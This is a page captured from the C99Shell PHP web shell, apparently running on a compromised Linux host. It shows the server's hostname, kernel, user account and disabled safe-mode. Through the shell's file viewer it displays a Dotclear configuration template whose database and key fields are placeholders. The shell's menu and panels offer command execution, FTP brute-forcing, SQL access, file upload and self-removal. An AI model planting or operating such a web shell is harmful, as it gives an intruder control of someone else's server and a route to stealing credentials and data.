!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/var/softaculous/dotcl/   drwxr-xr-x
Free 293.62 GB of 429.69 GB (68.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     config.php (2.67 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package Dotclear
 *
 * @copyright Olivier Meunier & Association Dotclear
 * @copyright AGPL-3.0
 */

use Dotclear\Helper\File\Path;

if (!
defined('DC_RC_PATH')) {
  return;
}

// Database driver (mysql (deprecated, disabled in PHP7), mysqli, mysqlimb4 (full UTF-8), pgsql, sqlite)
define('DC_DBDRIVER','mysqli');

// Database hostname (usually "localhost")
define('DC_DBHOST','[[softdbhost]]');

// Database user
define('DC_DBUSER','[[softdbuser]]');

// Database password
define('DC_DBPASSWORD','[[softdbpass]]');

// Database name
define('DC_DBNAME','[[softdb]]');

// Tables' prefix
define('DC_DBPREFIX','[[dbprefix]]');

// Persistent database connection
define('DC_DBPERSIST'false);

// Crypt key (password storage)
define('DC_MASTER_KEY','[[secret]]');

// Admin URL. You need to set it for some features.
define('DC_ADMIN_URL','[[softurl]]/admin/');

// Admin mail from address. For password recovery and such.
define('DC_ADMIN_MAILFROM','[[admin_email]]');

// Cookie's name
define('DC_SESSION_NAME''dcxd');

// Session TTL
//define('DC_SESSION_TTL','120 seconds');

// Plugins root
define('DC_PLUGINS_ROOT','[[softpath]]/plugins');

// Template cache directory
define('DC_TPL_CACHE','[[softpath]]/cache');

// Var directory
define('DC_VAR','[[softpath]]/var');

// Cryptographic algorithm
define('DC_CRYPT_ALGO''sha512');

// Vendor name
//define('DC_VENDOR_NAME', 'Dotclear');

// Do not check for update
//define('DC_NOT_UPDATE', false);

// Update URL
//define('DC_UPDATE_URL','https://download.dotclear.org/versions.xml');

// Update channel (stable, unstable, testing)
//define('DC_UPDATE_VERSION', 'stable');

// Proxy config
//define('HTTP_PROXY_HOST','127.0.0.1');
//define('HTTP_PROXY_PORT','8080');
//define('DC_REVERSE_PROXY',true);

// Show hidden media dirs
//define('DC_SHOW_HIDDEN_DIRS', false);

// Store update checking
//define('DC_STORE_NOT_UPDATE', false);

// Disable REST services (may be useful during debugging session)
//define('DC_REST_SERVICES', false);

// Load Legacy JS library
//define('DC_MIGRATE', false);

// If you have PATH_INFO issue, uncomment following lines
//if (!isset($_SERVER['ORIG_PATH_INFO'])) {
//    $_SERVER['ORIG_PATH_INFO'] = '';
//}
//$_SERVER['PATH_INFO'] = $_SERVER['ORIG_PATH_INFO'];

// If you have mail problems, uncomment following lines and adapt it to your hosting configuration
// For more information about this setting, please refer to https://dotclear.org/documentation/2.0/admin/install/custom-sendmail
//function _mail($to, $subject, $message, $headers)
//{
//    \Dotclear\Helper\Network\Mail\MailSocket::$smtp_relay = 'my.smtp.relay.org';
//    \Dotclear\Helper\Network\Mail\MailSocket::mail($to, $subject, $message, $headers);
//}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0037 ]--